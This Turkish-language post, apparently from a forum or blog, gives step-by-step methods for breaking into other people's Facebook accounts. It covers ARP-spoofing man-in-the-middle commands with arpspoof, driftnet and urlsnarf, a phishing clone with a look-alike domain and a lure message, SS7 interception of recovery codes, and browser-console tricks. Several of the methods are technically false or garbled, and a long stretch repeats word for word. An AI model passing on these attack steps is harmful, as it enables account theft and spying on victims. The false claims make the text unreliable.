Merhaba ben Mustafa73 Lojistik Tim adına paylaşım yapıyorum.
Facebook hackleme makalesinde sizi görmekten mutluyum.
Kaynak Kodunu Kullanarak Facebook Hackleme:
Bu yöntem, Facebook hesabının şifresini çalmak için bir tür hackleme yöntemidir. Bu yöntem, web tarayıcısının kaynak kodunu manipüle ederek, Facebook'un şifreyi gizlemek için kullandığı kodu kırar. Bu yöntem, sadece Facebook hesabına giriş yapmış olan bir bilgisayarda çalışır. Bu yöntemi kullanmak için şu adımları takip etmeniz gerekir:
- Facebook web sitesine gidin ve sağ üst köşedeki hesap ayarları simgesine tıklayarak çıkış yapın. Bu, arama kutusunu görmenizi sağlar.
- Web sayfasının kaynak kodunu görüntülemek için klavyenizde Ctrl + U tuşlarına basın. Bu, web sayfasının HTML kodunu gösteren yeni bir sekme açacaktır.
- Bu sekmede, Ctrl + F tuşlarına basarak arama kutusunu açın ve "action" kelimesini arayın. Bu, web sayfasındaki oturum açma formunun hangi dosyaya veri gönderdiğini belirten bir öznitelik bulmanızı sağlar. Bu özniteliğin değeri genellikle "https://www.facebook.com/login.php?login_attempt=1&lwv=111" şeklindedir.
- Bu değeri kopyalayın ve bir not defterine yapıştırın. Ardından, değerin sonundaki "login.php" kısmını "process.php" olarak değiştirin. Bu, oturum açma formunun verileri işleyen farklı bir dosyaya göndermesini sağlayacaktır.
- Kaynak kod sekmesine geri dönün ve Ctrl + Shift + I tuşlarına basarak öğeyi incele seçeneğini açın. Bu, web sayfasının HTML kodunu düzenlemenize olanak tanıyan bir araç çubuğu açacaktır.
- Bu araç çubuğunda, yeşil renkle vurgulanan "action" özniteliğini bulun ve değerini not defterine yapıştırdığınız "process.php" ile değiştirin. Bu, oturum açma formunun verileri işleyen farklı bir dosyaya göndermesini sağlayacaktır.
- Değişiklikleri kaydetmek için araç çubuğunun sağ üst köşesindeki disket simgesine tıklayın ve web sayfasını yenileyin.
- Şimdi, şifresini çalmak istediğiniz kişinin e-posta adresini arama kutusuna girin ve öğeyi incele seçeneğini kullanarak şifre kutusuna sağ tıklayın.
- Bu, şifre kutusunun HTML kodunu gösterecektir. Bu kodda, "< input type="password" " yazan bir satır bulacaksınız.
- Bu satırda, "password" kelimesini "text" olarak değiştirin. Bu, şifreyi gizlemek yerine göstermesini sağlayacaktır.
- Şimdi, şifresini çalmak istediğiniz kişinin şifresini görebilirsiniz.
Bu yöntem sadece Facebook hesabına giriş yapmış olan bir bilgisayarda çalışır. Eğer başka bir bilgisayarda denerseniz, bu yöntem işe yaramaz. Bu yöntemin çalışması için, Facebook hesabına giriş yapmış olan kişinin bilgisayarını kullanmanız gerekir. Bu da, kişisel mahremiyetini ihlal etmek anlamına gelir.
2) Ortadaki Adam Yöntemiyle Facebook Hackleme:
Bu yöntem, bir Wi-Fi ağına bağlı olan bir cihazın Facebook hesabını ele geçirmek için kullanılan bir saldırı türüdür. Bu saldırıda, saldırgan Wi-Fi ağındaki veri paketlerini yakalar, değiştirir ve yeniden yönlendirir. Böylece, saldırgan hedef cihazın Facebook şifresini ve diğer bilgilerini görebilir. Bu saldırıyı yapmak için şu adımları takip etmeniz gerekir:
- Kali Linux işletim sistemi: Bu, güvenlik testleri ve sızma testleri için özel olarak tasarlanmış bir Linux dağıtımıdır. Bu işletim sistemi, saldırı için gerekli olan birçok araç ve program içerir. Bu işletim sistemini bir USB bellekten veya sanal bir makineden çalıştırabilirsiniz.
- İyi ağ arayüzü komutu: Bu, ağ arabirimlerini kontrol etmek ve yapılandırmak için kullanılan bir komuttur. Ağ arabirimi, bilgisayarınızın ağa bağlanmasını sağlayan bir donanım veya yazılım bileşenidir. Örneğin, Wi-Fi kartınız veya Ethernet kartınız bir ağ arabirimidir. Bu komut, ağ arabirimlerinin adlarını, durumlarını, IP adreslerini ve diğer bilgilerini gösterir.
- Komut satırlarını yürütme konusunda iyi bilgi: Bu, saldırı için gerekli olan araç ve programları çalıştırmak için gereklidir. Komut satırı, bilgisayarınıza metin tabanlı komutlar vermenizi sağlayan bir arayüzdür. Kali Linux işletim sisteminde, komut satırına Terminal uygulamasından erişebilirsiniz. Komut satırında, komutları yazarak ve Enter tuşuna basarak çalıştırabilirsiniz.
- Ağ arayüzünün adını öğrenin: Bu, saldırı için kullanacağınız ağ arabirimini belirlemeniz için gereklidir. Ağ arabiriminin adı, genellikle wlan0, eth0, lo gibi kısaltmalardan oluşur. Ağ arayüzünün adını öğrenmek için, Terminal uygulamasında ipconfig komutunu çalıştırabilirsiniz. Bu komut, ağ arabirimlerinin adlarını ve diğer bilgilerini gösterir. Saldırı için, Wi-Fi ağına bağlı olan ağ arabirimini seçmeniz gerekir. Bu ağ arabiriminin adını kopyalayın ve bir yere kaydedin.
- Sızacağınız Wi-Fi yönlendiricinin IP adreslerini alın: Bu, saldırı için hedef alacağınız Wi-Fi yönlendiricisinin IP adresini belirlemeniz için gereklidir. IP adresi, bir ağdaki cihazları tanımlamak için kullanılan bir numaradır. Wi-Fi yönlendiricisi, ağdaki cihazların birbirleriyle ve internetle iletişim kurmasını sağlayan bir cihazdır. Wi-Fi yönlendiricisinin IP adresini öğrenmek için, Terminal uygulamasında IP route show komutunu çalıştırabilirsiniz. Bu komut, ağdaki yönlendiricilerin IP adreslerini ve diğer bilgilerini gösterir. Saldırı için, Wi-Fi ağına bağlı olan yönlendiricinin IP adresini seçmeniz gerekir. Bu IP adresini kopyalayın ve bir yere kaydedin.
- Hedef cihaz IP’si: Bu, saldırı için hedef alacağınız cihazın IP adresini belirlemeniz için gereklidir. Bu cihaz, Wi-Fi ağına bağlı olan ve Facebook hesabını ele geçirmek istediğiniz cihazdır. Bu cihazın IP adresini öğrenmek için, bir Ağ İzleme Yazılım Aracı kullanabilirsiniz. Bu araç, ağdaki cihazların IP adreslerini, MAC adreslerini, işletim sistemlerini ve diğer bilgilerini gösterir. Örneğin, Nmap, Wireshark, Zenmap gibi araçlar bu amaçla kullanılabilir. Bu araçlardan birini Terminal uygulamasında çalıştırarak, hedef cihazın IP adresini bulabilirsiniz. Bu IP adresini kopyalayın ve bir yere kaydedin.
- Yeni bir terminalde aşağıdaki komutu yürüterek Linux’ta IPv4 paket iletmeyi etkinleştirin: sysctl -w net.ipv4.ip_forward=1: Bu, saldırı için gerekli olan bir ayarı yapmanız için gereklidir. IPv4 paket iletmeyi etkinleştirmek, ağdaki veri paketlerinin bir ağ arabiriminden diğerine geçmesine izin verir. Bu, saldırı sırasında veri paketlerini değiştirebilmeniz ve yeniden yönlendirebilmeniz için önemlidir. Bu ayarı yapmak için, Terminal uygulamasında sysctl -w net.ipv4.ip_forward=1 komutunu çalıştırabilirsiniz. Bu komut, IPv4 paket iletmeyi 0'dan 1'e değiştirir. Bu, paket iletmeyi devre dışı bırakmaktan etkinleştirmeye geçtiğiniz anlamına gelir.
- Arpspoof kullanarak kurbandan gelen paketleri durdurun: Bu, saldırının ilk aşamasıdır. Arpspoof, ARP protokolünü kullanarak ağdaki cihazların IP adresleri ile MAC adresleri arasındaki eşleşmeyi değiştiren bir programdır. ARP protokolü, ağdaki cihazların birbirlerini tanımlamasını sağlayan bir protokoldür. MAC adresi, bir ağdaki cihazları tanımlamak için kullanılan başka bir numaradır. Arpspoof, hedef cihazın Wi-Fi yönlendiricisine giden paketleri durdurarak, saldırganın cihazın yerine geçmesini sağlar. Böylece, hedef cihaz Wi-Fi yönlendiricisi ile iletişim kuramaz. Bu işlemi yapmak için, Terminal uygulamasında arpspoof -i [Ağ Arayüzü Adı] -t [Victim IP] [Router IP] komutunu çalıştırabilirsiniz. Bu komut, ağ arayüzü adı, kurban IP ve yönlendirici IP parametrelerini alır. Bu parametreleri, daha önce kaydettiğiniz değerlerle değiştirmeniz gerekir. Örneğin, arpspoof -i wlan0 -t 192.000.000.52 192.000.000.1 komutu, wlan0 adlı ağ arayüzü ile 192.000.000.52 IP adresine sahip kurbanın, 192.000.000.1 IP adresine sahip yönlendiriciye giden paketleri durdurur. Bu komutu çalıştırdıktan sonra, komutun çalışmasına izin verin ve durdurmayın.
- arpspoof sızdırma program kodunu kullanarak yönlendiriciden gelen paketleri durdurun: Bu, saldırının ikinci aşamasıdır. Bu aşamada, saldırgan yönlendiriciden gelen paketleri de durdurarak, hedef cihaz ile yönlendirici arasındaki bağlantıyı tamamen keser. Böylece, saldırgan hem hedef cihazın hem de yönlendiricinin yerine geçer. Bu işlemi yapmak için, Terminal uygulamasında arpspoof -i [Ağ Arayüzü Adı] -t [Router IP] [Victim IP] komutunu çalıştırabilirsiniz. Bu komut, ağ arayüzü adı, yönlendirici IP ve kurban IP parametrelerini alır. Bu parametreleri, daha önce kaydettiğiniz değerlerle değiştirmeniz gerekir. Örneğin, arpspoof -i wlan0 -t 192.000.000.1 192.000.000.52 komutu, wlan0 adlı ağ arayüzü ile 192.000.000.1 IP adresine sahip yönlendiricinin, 192.000.000.52 IP adresine sahip kurbanın gelen paketleri durdurur. Bu komutu çalıştırdıktan sonra, komutun çalışmasına izin verin ve durdurmayın. Bu iki komutu çalıştırdığınızda, saldırgan hedef cihaz ile yönlendirici arasındaki bağlantıyı ele geçirir. Böylece, saldırgan hedef cihazın Facebook hesabına giren veri paketlerini görebilir ve değiştirebilir. Bu veri paketlerini görmek ve değiştirmek için, aşağıdaki adımları izleyebilirsiniz:
- Driftnet’i kullanarak kurban navigasyonundan görüntüleri koklayın: Bu, saldırının üçüncü aşamasıdır. Driftnet, ağ trafiğini dinlemek ve TCP akışlarından görüntü almak için kullanılan bir programdır. TCP akışları, ağdaki cihazların veri alışverişi yapmak için kullandığı bir protokoldür. Driftnet, hedef cihazın Facebook'ta gördüğü veya paylaştığı görüntüleri yakalamanızı sağlar. Bu işlemi yapmak için, Terminal uygulamasında driftnet -i [Ağ Arayüzü Adı] komutunu çalıştırabilirsiniz. Bu komut, ağ arayüzü adı parametresini alır. Bu parametreyi, daha önce kaydettiğiniz değerle değiştirmeniz gerekir. Örneğin, driftnet -i wlan0 komutu, wlan0 adlı ağ arayüzü ile ağ trafiğinden görüntü alır. Bu komutu çalıştırdıktan sonra, komutun çalışmasına izin verin ve durdurmayın. Bu komut, bir pencere açarak, yakaladığınız görüntüleri gösterir.
- urlsnarf kullanarak kurban navigasyonundan URL bilgilerini koklayın: Bu, saldırının dördüncü aşamasıdır. urlsnarf, bir Ortak Günlük biçimini izleyerek tüm HTTP isteklerini koklamanızı sağlar. HTTP istekleri, ağdaki cihazların web sayfalarına erişmek için kullandığı bir protokoldür. urlsnarf, hedef cihazın Facebook'ta ziyaret ettiği veya aradığı web sayfalarının URL'lerini yakalamanızı sağlar. Bu işlemi yapmak için, Terminal uygulamasında urlsnarf -i [Ağ arabirimi adı] komutunu çalıştırabilirsiniz. Bu komut, ağ arabirimi adı parametresini alır. Bu parametreyi, daha önce kaydettiğiniz değerle değiştirmeniz gerekir. Örneğin, urlsnarf -i wlan0 komutu, wlan0 adlı ağ arabirimi ile tüm HTTP isteklerini koklar. Bu komutu çalıştırdıktan sonra, komutun çalışmasına izin verin ve durdurmayın. Bu komut, Terminal uygulamasında, yakaladığınız URL'leri gösterir.
Bu iki komutu çalıştırdığınızda, saldırgan hedef cihazın Facebook hesabına ilişkin görüntü ve URL bilgilerini elde eder. Bu bilgiler, saldırganın hedef cihazın Facebook şifresini, mesajlarını, arkadaşlarını, beğenilerini ve diğer bilgilerini öğrenmesine yardımcı olabilir. Bu bilgileri kullanarak, saldırgan hedef cihazın Facebook hesabını ele geçirebilir veya kötüye kullanabilir.
Saldırıyı tamamladığınızda, aşağıdaki komutu yürüterek paket iletmeyi devre dışı bırakın: sysctl -w net.ipv4.ip_forward=0. Bu komut, IPv4 paket iletmeyi 1'den 0'a değiştirir. Bu, paket iletmeyi etkinleştirmekten devre dışı bırakmaya geçtiğiniz anlamına gelir. Bu, ağdaki veri paketlerinin bir ağ arabiriminden diğerine geçmesini engeller. Bu, saldırının sonlandırılması için gereklidir.
Bu yöntem, bir Wi-Fi ağına bağlı olan bir cihazın Facebook hesabını ele geçirmek için kullanılan bir saldırı türüdür. Bu saldırıda, saldırgan Wi-Fi ağındaki veri paketlerini yakalar, değiştirir ve yeniden yönlendirir. Böylece, saldırgan hedef cihazın Facebook şifresini ve diğer bilgilerini görebilir. Bu saldırıyı yapmak için, yukarıda anlattığım adımları takip etmeniz gerekir.
Bu saldırıyı önlemek için, Wi-Fi ağınızın güvenliğini artırmalısınız. Wi-Fi ağınızın şifresini güçlü ve karmaşık bir şekilde belirlemeli, düzenli olarak değiştirmeli, WPA2 veya WPA3 gibi güvenli bir şifreleme protokolü kullanmalı, ağınıza bağlanan cihazları kontrol etmeli ve şüpheli aktiviteleri rapor etmelisiniz. Ayrıca, Facebook hesabınızın güvenliğini de artırmalısınız. Facebook hesabınızın şifresini güçlü ve karmaşık bir şekilde belirlemeli, düzenli olarak değiştirmeli, iki faktörlü kimlik doğrulama gibi ek güvenlik önlemleri kullanmalı, hesabınıza giriş yapan cihazları kontrol etmeli ve şüpheli aktiviteleri rapor etmelisiniz.
3) Phishing ile Facebook Hesabı Hacklemek:
Bu yöntem, bir kişiyi sahte bir Facebook giriş sayfasına yönlendirerek, onun e-posta ve şifresini ele geçirmeye çalışır. Bu yöntemde, saldırgan hedef kişiye bir bağlantı gönderir ve onu Facebook hesabına giriş yapması için ikna eder. Ancak bağlantı, gerçek Facebook sayfasına değil, saldırganın oluşturduğu sahte bir sayfaya götürür. Hedef kişi bilgilerini girer girmez, saldırgan bunları alır ve gerçek Facebook sayfasına yönlendirir. Bu yöntemi kullanmak için aşağıdaki adımları izleyebilirsiniz:
- İlk olarak, internet bağlantınız olduğundan emin olun. Bu yöntem için internet bağlantısı şarttır.
- Sonra, sahte bir kimlik avı sayfası oluşturmanız gerekir. Bu sayfa, gerçek Facebook giriş sayfasının birebir kopyası olmalıdır. Bunu yapmak için, Facebook.com'a gidin ve hesabınızdan çıkış yaptığınızdan emin olun. Ardından, klavyenizde Ctrl + U tuşlarına basarak sayfanın kaynak kodunu görüntüleyin. Bu kod, sayfanın nasıl göründüğünü ve nasıl çalıştığını belirleyen HTML kodudur. Kaynak kodunu gördüğünüzde, tümünü seçin, kopyalayın ve bir not defterine yapıştırın. Bunu Ctrl + A, Ctrl + C ve Ctrl + V tuşlarına basarak gerçekleştirebilirsiniz.
- Kaynak kodunu not defterine kopyaladıktan sonra, bir değişiklik yapmanız gerekir. Bu değişiklik, sayfadaki oturum açma formunun eylem özniteliğini değiştirmektir. Eylem özniteliği, formun verilerini nereye göndereceğini belirler. Şu anda, bu öznitelik gerçek Facebook sayfasına işaret ediyor. Bunu değiştirmek için, not defterinde eylem kelimesini arayın. Bunu Ctrl + F tuşlarına basarak gerçekleştirebilirsiniz. Eylem kelimesini bulduğunuzda, yanındaki değeri process.php ile değiştirin. Bu, formun verilerini process.php adlı bir dosyaya göndereceği anlamına gelir. Bu dosyayı daha sonra oluşturacağız. Değişikliği yaptıktan sonra, kaynak kodunu kaydedin. Bunu Ctrl + S tuşlarına basarak gerçekleştirebilirsiniz.
- Şimdi, sahte bir web sitesi oluşturmak için bir web barındırma hizmeti kullanmanız gerekir. Web barındırma hizmeti, web sitenizi internete yüklemenizi ve erişilebilir kılmanızı sağlar. Örneğin, 000webhost, Hostinger, Wix gibi hizmetlerden birini seçebilirsiniz. Bu hizmetlere ücretsiz olarak kaydolabilirsiniz. Web barındırma hizmetine kaydolduğunuzda, bir alan adı seçmeniz gerekir. Alan adı, web sitenizin internet adresidir. Örneğin, facebook-login.com gibi. Bu alan adının gerçek Facebook sayfasına benzediğinden emin olun. Böylece, hedef kişi fark etmez ve bağlantıya tıklar.
- Web barındırma hizmetinin kontrol paneline girdiğinizde, dosya yöneticisini açın. Buradan, kaynak kodunu kaydettiğiniz not defteri dosyasını yükleyin. Dosyanın adını index.html olarak değiştirin. Bu, web sitenizin ana sayfası olacaktır. Ayrıca, process.php adında başka bir dosya oluşturun ve aşağıdaki kodu içine yapıştırın:
- Bu kod, hedef kişinin girdiği e-posta ve şifreyi log.txt adlı bir dosyaya kaydeder ve onu gerçek Facebook sayfasına yönlendirir. Böylece, hedef kişi hiçbir şeyden şüphelenmez. Bu iki dosyayı web barındırma hizmetine yükledikten sonra, sahte web sitenizin hazır olduğunu göreceksiniz.
- Son adım olarak, hedef kişiye sahte web sitenizin bağlantısını gönderin ve onu Facebook hesabına giriş yapması için ikna edin. Örneğin, ona bir mesaj gönderebilirsiniz: "Hey, bu yeni Facebook özelliğini gördün mü? Çok harika! Hemen denemelisin. İşte bağlantısı: https://facebook-login.com"
- Hedef kişi bağlantıya tıkladığında, sahte Facebook giriş sayfasına yönlendirilecek ve e-posta ve şifresini girmesi istenecektir. Hedef kişi bilgilerini girdiğinde, siz de web barındırma hizmetinin kontrol panelinden log.txt dosyasını açarak bunları alabileceksiniz.
Bu yöntem, sahte bir Facebook giriş sayfası oluşturarak, bir kişinin e-posta ve şifresini ele geçirmenizi sağlar.
4) SS-7 GÜVENLİK AÇIĞI KULLANARAK FACEBOOK HACKLEME
SS7 Güvenlik Açığı, GSM ağlarında kullanılan bir iletişim protokolü olan SS7'nin (Signaling System 7) zayıf noktalarını kullanan bir siber saldırı türüdür. SS7, cep telefonlarının kendi operatörleri dışındaki operatörler ile haberleşmesini sağlayan bir ağdır. Bu ağ üzerinden, saldırganlar hedef kişinin SMS trafiğini, konumunu, arama kayıtlarını ve diğer bilgilerini ele geçirebilirler.
SS7 Güvenlik Açığı kullanarak Facebook hesabına erişmek için, hedef kişinin cep telefonu numarasını bilmek ve SS7 ağına erişim sağlayabilecek bir Linux işletim sistemi ve SS7 SDK'sına sahip olmak gerekmektedir. Bu şartları sağladıktan sonra, aşağıdaki adımları takip edebilirsiniz:
- Hedefin cep telefonu numarasını sahte bir MSC (Mobile Switching Center) düğümüne kaydedin. Bu sayede, hedefin gerçek operatörü ile bağlantısı kesilecek ve sizin kontrolünüzdeki sahte operatöre yönlendirilecektir.
- Facebook'ta Parolanızı Unuttum seçeneğini açın ve kullanıcının cep telefonu numarasını girin. Facebook, hedefe iki faktörlü kimlik doğrulama için bir kurtarma kodu gönderecektir.
- Gerçek MSC, SMS'yi SMS-C (Short Message Service Center)'ye dönüştürecektir. SMS-C, HLR (Home Location Register) ile iletişime geçecek ve hedefin yerini soracaktır.
- Gerçek HLR, sahte olan bir MSC adresi sağlayarak yanıt verecektir. Böylece, iki faktörlü kimlik doğrulama kurtarma kodu ele geçirilecek ve cihazınıza yönlendirilecektir.
- Ardından şifreyi sıfırlayabilir ve kişinin Facebook hesabına erişebilirsiniz.
5) Hedefin Kimliğini Kullanarak Facebook Hackleme
Bu yöntem sadece Kanada ve ABD dışındaki ülkelerde çalışıyor. Aşağıdaki adımları takip ederek bunu deneyebilirsiniz:
- Öncelikle, sohbet geçmişini görmek istediğiniz kişinin Facebook profil sayfasını açın.
- Sayfada, "Poke" (Dürt) adlı bir seçenek arayın. Bu, genellikle profil fotoğrafının altında veya sağ üst köşede bulunur.
- Poke seçeneğinin üzerine sağ tıklayın ve açılan menüden "Bağlantıyı Kopyala" seçin. Bu, o kişinin Facebook kimliğini içeren bir bağlantı kopyalamanızı sağlar. Bağlantı şöyle görünmelidir: https://www.facebook.com/profile.php?id=10007370953577
- Sonra, tarayıcınızın adres çubuğuna gidin ve şu kodu yapıştırın: javascript: Chat.openTab (VICTIM’S ID). Burada, VICTIM'S ID yerine kopyaladığınız Facebook kimliğini yazın. Örneğin, javascript: Chat.openTab (1234567890).
- Ardından, Enter tuşuna basın. Eğer her şey doğruysa, o kişinin Facebook'ta yaptığı tüm sohbetleri gösteren bir pencere açılacaktır. Bu, onların arkadaşlarıyla veya gruplarla yaptığı metin mesajlarını, sesli aramalarını ve video görüşmelerini içerir.
Bu yöntem, Facebook'un sohbet verilerini nasıl sakladığına bağlı olarak değişebilir. Bu nedenle, her zaman çalışmayabilir veya beklediğiniz sonucu vermeyebilir.
Facebook hackleme makalesinde sizi görmekten mutluyum.
Kaynak Kodunu Kullanarak Facebook Hackleme:
Bu yöntem, Facebook hesabının şifresini çalmak için bir tür hackleme yöntemidir. Bu yöntem, web tarayıcısının kaynak kodunu manipüle ederek, Facebook'un şifreyi gizlemek için kullandığı kodu kırar. Bu yöntem, sadece Facebook hesabına giriş yapmış olan bir bilgisayarda çalışır. Bu yöntemi kullanmak için şu adımları takip etmeniz gerekir:
- Facebook web sitesine gidin ve sağ üst köşedeki hesap ayarları simgesine tıklayarak çıkış yapın. Bu, arama kutusunu görmenizi sağlar.
- Web sayfasının kaynak kodunu görüntülemek için klavyenizde Ctrl + U tuşlarına basın. Bu, web sayfasının HTML kodunu gösteren yeni bir sekme açacaktır.
- Bu sekmede, Ctrl + F tuşlarına basarak arama kutusunu açın ve "action" kelimesini arayın. Bu, web sayfasındaki oturum açma formunun hangi dosyaya veri gönderdiğini belirten bir öznitelik bulmanızı sağlar. Bu özniteliğin değeri genellikle "https://www.facebook.com/login.php?login_attempt=1&lwv=111" şeklindedir.
- Bu değeri kopyalayın ve bir not defterine yapıştırın. Ardından, değerin sonundaki "login.php" kısmını "process.php" olarak değiştirin. Bu, oturum açma formunun verileri işleyen farklı bir dosyaya göndermesini sağlayacaktır.
- Kaynak kod sekmesine geri dönün ve Ctrl + Shift + I tuşlarına basarak öğeyi incele seçeneğini açın. Bu, web sayfasının HTML kodunu düzenlemenize olanak tanıyan bir araç çubuğu açacaktır.
- Bu araç çubuğunda, yeşil renkle vurgulanan "action" özniteliğini bulun ve değerini not defterine yapıştırdığınız "process.php" ile değiştirin. Bu, oturum açma formunun verileri işleyen farklı bir dosyaya göndermesini sağlayacaktır.
- Değişiklikleri kaydetmek için araç çubuğunun sağ üst köşesindeki disket simgesine tıklayın ve web sayfasını yenileyin.
- Şimdi, şifresini çalmak istediğiniz kişinin e-posta adresini arama kutusuna girin ve öğeyi incele seçeneğini kullanarak şifre kutusuna sağ tıklayın.
- Bu, şifre kutusunun HTML kodunu gösterecektir. Bu kodda, "< input type="password" " yazan bir satır bulacaksınız.
- Bu satırda, "password" kelimesini "text" olarak değiştirin. Bu, şifreyi gizlemek yerine göstermesini sağlayacaktır.
- Şimdi, şifresini çalmak istediğiniz kişinin şifresini görebilirsiniz.
Bu yöntem sadece Facebook hesabına giriş yapmış olan bir bilgisayarda çalışır. Eğer başka bir bilgisayarda denerseniz, bu yöntem işe yaramaz. Bu yöntemin çalışması için, Facebook hesabına giriş yapmış olan kişinin bilgisayarını kullanmanız gerekir. Bu da, kişisel mahremiyetini ihlal etmek anlamına gelir.
2) Ortadaki Adam Yöntemiyle Facebook Hackleme:
Bu yöntem, bir Wi-Fi ağına bağlı olan bir cihazın Facebook hesabını ele geçirmek için kullanılan bir saldırı türüdür. Bu saldırıda, saldırgan Wi-Fi ağındaki veri paketlerini yakalar, değiştirir ve yeniden yönlendirir. Böylece, saldırgan hedef cihazın Facebook şifresini ve diğer bilgilerini görebilir. Bu saldırıyı yapmak için şu adımları takip etmeniz gerekir:
- Kali Linux işletim sistemi: Bu, güvenlik testleri ve sızma testleri için özel olarak tasarlanmış bir Linux dağıtımıdır. Bu işletim sistemi, saldırı için gerekli olan birçok araç ve program içerir. Bu işletim sistemini bir USB bellekten veya sanal bir makineden çalıştırabilirsiniz.
- İyi ağ arayüzü komutu: Bu, ağ arabirimlerini kontrol etmek ve yapılandırmak için kullanılan bir komuttur. Ağ arabirimi, bilgisayarınızın ağa bağlanmasını sağlayan bir donanım veya yazılım bileşenidir. Örneğin, Wi-Fi kartınız veya Ethernet kartınız bir ağ arabirimidir. Bu komut, ağ arabirimlerinin adlarını, durumlarını, IP adreslerini ve diğer bilgilerini gösterir.
- Komut satırlarını yürütme konusunda iyi bilgi: Bu, saldırı için gerekli olan araç ve programları çalıştırmak için gereklidir. Komut satırı, bilgisayarınıza metin tabanlı komutlar vermenizi sağlayan bir arayüzdür. Kali Linux işletim sisteminde, komut satırına Terminal uygulamasından erişebilirsiniz. Komut satırında, komutları yazarak ve Enter tuşuna basarak çalıştırabilirsiniz.
- Ağ arayüzünün adını öğrenin: Bu, saldırı için kullanacağınız ağ arabirimini belirlemeniz için gereklidir. Ağ arabiriminin adı, genellikle wlan0, eth0, lo gibi kısaltmalardan oluşur. Ağ arayüzünün adını öğrenmek için, Terminal uygulamasında ipconfig komutunu çalıştırabilirsiniz. Bu komut, ağ arabirimlerinin adlarını ve diğer bilgilerini gösterir. Saldırı için, Wi-Fi ağına bağlı olan ağ arabirimini seçmeniz gerekir. Bu ağ arabiriminin adını kopyalayın ve bir yere kaydedin.
- Sızacağınız Wi-Fi yönlendiricinin IP adreslerini alın: Bu, saldırı için hedef alacağınız Wi-Fi yönlendiricisinin IP adresini belirlemeniz için gereklidir. IP adresi, bir ağdaki cihazları tanımlamak için kullanılan bir numaradır. Wi-Fi yönlendiricisi, ağdaki cihazların birbirleriyle ve internetle iletişim kurmasını sağlayan bir cihazdır. Wi-Fi yönlendiricisinin IP adresini öğrenmek için, Terminal uygulamasında IP route show komutunu çalıştırabilirsiniz. Bu komut, ağdaki yönlendiricilerin IP adreslerini ve diğer bilgilerini gösterir. Saldırı için, Wi-Fi ağına bağlı olan yönlendiricinin IP adresini seçmeniz gerekir. Bu IP adresini kopyalayın ve bir yere kaydedin.
- Hedef cihaz IP’si: Bu, saldırı için hedef alacağınız cihazın IP adresini belirlemeniz için gereklidir. Bu cihaz, Wi-Fi ağına bağlı olan ve Facebook hesabını ele geçirmek istediğiniz cihazdır. Bu cihazın IP adresini öğrenmek için, bir Ağ İzleme Yazılım Aracı kullanabilirsiniz. Bu araç, ağdaki cihazların IP adreslerini, MAC adreslerini, işletim sistemlerini ve diğer bilgilerini gösterir. Örneğin, Nmap, Wireshark, Zenmap gibi araçlar bu amaçla kullanılabilir. Bu araçlardan birini Terminal uygulamasında çalıştırarak, hedef cihazın IP adresini bulabilirsiniz. Bu IP adresini kopyalayın ve bir yere kaydedin.
- Yeni bir terminalde aşağıdaki komutu yürüterek Linux’ta IPv4 paket iletmeyi etkinleştirin: sysctl -w net.ipv4.ip_forward=1: Bu, saldırı için gerekli olan bir ayarı yapmanız için gereklidir. IPv4 paket iletmeyi etkinleştirmek, ağdaki veri paketlerinin bir ağ arabiriminden diğerine geçmesine izin verir. Bu, saldırı sırasında veri paketlerini değiştirebilmeniz ve yeniden yönlendirebilmeniz için önemlidir. Bu ayarı yapmak için, Terminal uygulamasında sysctl -w net.ipv4.ip_forward=1 komutunu çalıştırabilirsiniz. Bu komut, IPv4 paket iletmeyi 0'dan 1'e değiştirir. Bu, paket iletmeyi devre dışı bırakmaktan etkinleştirmeye geçtiğiniz anlamına gelir.
- Arpspoof kullanarak kurbandan gelen paketleri durdurun: Bu, saldırının ilk aşamasıdır. Arpspoof, ARP protokolünü kullanarak ağdaki cihazların IP adresleri ile MAC adresleri arasındaki eşleşmeyi değiştiren bir programdır. ARP protokolü, ağdaki cihazların birbirlerini tanımlamasını sağlayan bir protokoldür. MAC adresi, bir ağdaki cihazları tanımlamak için kullanılan başka bir numaradır. Arpspoof, hedef cihazın Wi-Fi yönlendiricisine giden paketleri durdurarak, saldırganın cihazın yerine geçmesini sağlar. Böylece, hedef cihaz Wi-Fi yönlendiricisi ile iletişim kuramaz. Bu işlemi yapmak için, Terminal uygulamasında arpspoof -i [Ağ Arayüzü Adı] -t [Victim IP] [Router IP] komutunu çalıştırabilirsiniz. Bu komut, ağ arayüzü adı, kurban IP ve yönlendirici IP parametrelerini alır. Bu parametreleri, daha önce kaydettiğiniz değerlerle değiştirmeniz gerekir. Örneğin, arpspoof -i wlan0 -t 192.000.000.52 192.000.000.1 komutu, wlan0 adlı ağ arayüzü ile 192.000.000.52 IP adresine sahip kurbanın, 192.000.000.1 IP adresine sahip yönlendiriciye giden paketleri durdurur. Bu komutu çalıştırdıktan sonra, komutun çalışmasına izin verin ve durdurmayın.
- arpspoof sızdırma program kodunu kullanarak yönlendiriciden gelen paketleri durdurun: Bu, saldırının ikinci aşamasıdır. Bu aşamada, saldırgan yönlendiriciden gelen paketleri de durdurarak, hedef cihaz ile yönlendirici arasındaki bağlantıyı tamamen keser. Böylece, saldırgan hem hedef cihazın hem de yönlendiricinin yerine geçer. Bu işlemi yapmak için, Terminal uygulamasında arpspoof -i [Ağ Arayüzü Adı] -t [Router IP] [Victim IP] komutunu çalıştırabilirsiniz. Bu komut, ağ arayüzü adı, yönlendirici IP ve kurban IP parametrelerini alır. Bu parametreleri, daha önce kaydettiğiniz değerlerle değiştirmeniz gerekir. Örneğin, arpspoof -i wlan0 -t 192.000.000.1 192.000.000.52 komutu, wlan0 adlı ağ arayüzü ile 192.000.000.1 IP adresine sahip yönlendiricinin, 192.000.000.52 IP adresine sahip kurbanın gelen paketleri durdurur. Bu komutu çalıştırdıktan sonra, komutun çalışmasına izin verin ve durdurmayın. Bu iki komutu çalıştırdığınızda, saldırgan hedef cihaz ile yönlendirici arasındaki bağlantıyı ele geçirir. Böylece, saldırgan hedef cihazın Facebook hesabına giren veri paketlerini görebilir ve değiştirebilir. Bu veri paketlerini görmek ve değiştirmek için, aşağıdaki adımları izleyebilirsiniz:
